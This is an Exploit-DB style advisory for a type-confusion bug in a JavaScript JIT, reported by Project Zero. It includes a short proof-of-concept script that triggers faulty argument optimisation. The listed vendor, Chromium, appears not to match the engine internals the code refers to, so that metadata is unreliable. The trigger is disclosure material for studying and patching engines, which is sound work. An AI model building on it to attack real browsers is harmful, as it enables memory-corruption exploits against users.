Type Confusion in JITed Code

vendor:

Chromium

by:

Project Zero

7,5

CVSS

HIGH

Type Confusion

843

CWE

Product Name: Chromium

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: All

2018

Type Confusion in JITed Code

In the following JavaScript code, both of the print calls must print out "undefined" because of "x" is a formal parameter. But the second print call prints out "function x() { }". This bug may lead to type confusion in JITed code. The following code in "PreVisitFunction" is used to decide how to optimize arguments. "HasAnyWriteToFormals" set by "Parser::BindPidRefsInScope" returns true in the following example code where "x" is formal. But the method can't detect the above buggy case, so it may end up wrongly optimizing arguments.

Mitigation:

Ensure that all code is properly tested and reviewed for potential type confusion issues.

Source

Exploit-DB raw data:

/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1367

In the following JavaScript code, both of the print calls must print out "undefined" because of "x" is a formal parameter. But the second print call prints out "function x() { }". This bug may lead to type confusion in JITed code.

function f(x) {
    print(x);

    {
        function x() {

        }
    }

    print(x);
}

The following code in "PreVisitFunction" is used to decide how to optimize arguments.
    bool doStackArgsOpt = (!pnode->sxFnc.HasAnyWriteToFormals() || funcInfo->GetIsStrictMode());

"HasAnyWriteToFormals" set by "Parser::BindPidRefsInScope" returns true in the following example code where "x" is formal. But the method can't detect the above buggy case, so it may end up wrongly optimizing arguments.

function f(x) {
    x = 1;
}


PoC:
*/

function f(x) {
    arguments;

    {
        function x() {
        }
    }
}

for (let i = 0; i < 10000; i++)
    f();